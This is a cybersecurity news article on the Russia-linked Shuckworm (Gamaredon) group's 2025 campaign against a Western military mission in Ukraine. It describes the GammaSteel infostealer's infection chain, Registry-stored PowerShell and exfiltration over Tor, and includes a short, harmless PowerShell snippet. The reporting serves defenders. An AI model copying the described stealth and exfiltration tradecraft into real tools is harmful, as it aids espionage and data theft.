The Russia-linked espionage group Shuckworm has continued its relentless focus on Ukraine into 2025, with new attacks targeting a Western country’s military mission based in Eastern Europe.

This latest campaign, observed from February through March 2025, represents an evolution in the group’s tactics with a shift toward more sophisticated PowerShell-based malware tools that enhance stealth and persistence capabilities.

Shuckworm, also known as Gamaredon or Armageddon, has been active since 2013 and has almost exclusively targeted Ukrainian government, law enforcement, and defense organizations.

The initial infection vector in this campaign appears to be infected removable drives, demonstrating the group’s tactical awareness of potential airgapped environments in military settings.

The attackers deployed an updated version of their GammaSteel infostealer, designed to exfiltrate sensitive data from victim networks.

The campaign demonstrates Shuckworm’s move from VBS scripts to predominantly PowerShell-based tools, particularly in later stages of the attack chain.

This tactical shift allows the group to leverage PowerShell for increased obfuscation and provides the capability to store malicious scripts directly in the Windows Registry, reducing their footprint on disk.

Symantec researchers identified a complex, multi-staged attack chain featuring frequent use of obfuscation techniques designed to minimize detection risk.

Analysis of the infection timeline shows that following initial compromise in February, an array of malicious activity occurred on March 1st across multiple machines in the targeted network.

Infection Mechanism and Exfiltration Methods

The attack begins with a malicious LNK file on an external drive, which triggers a chain of events starting with an mshta.exe process executing JavaScript code.

This leads to the execution of heavily obfuscated VBScript files which establish persistence and contact command and control (C&C) servers.

The following code snippet shows how the malware uses PowerShell to capture system information:

[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$ScreenBounds = [System.Windows.Forms.SystemInformation]::PrimaryMonitorSize;
$w = $ScreenBounds."Width" + 1-1;
$h = $ScreenBounds."Height" + 1-1;

The malware stores its components across multiple Registry values, preventing easy detection and removal.

For data exfiltration, GammaSteel employs multiple methods including PowerShell web requests to Cloudflare-based domains, and as a fallback, cURL with Tor network proxying to mask the origin IP.

The malware specifically targets files with extensions like .doc, .docx, .xls, .pdf, and other document formats, while avoiding system folders containing strings like “windows” or “appdata.”

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!

Also Read: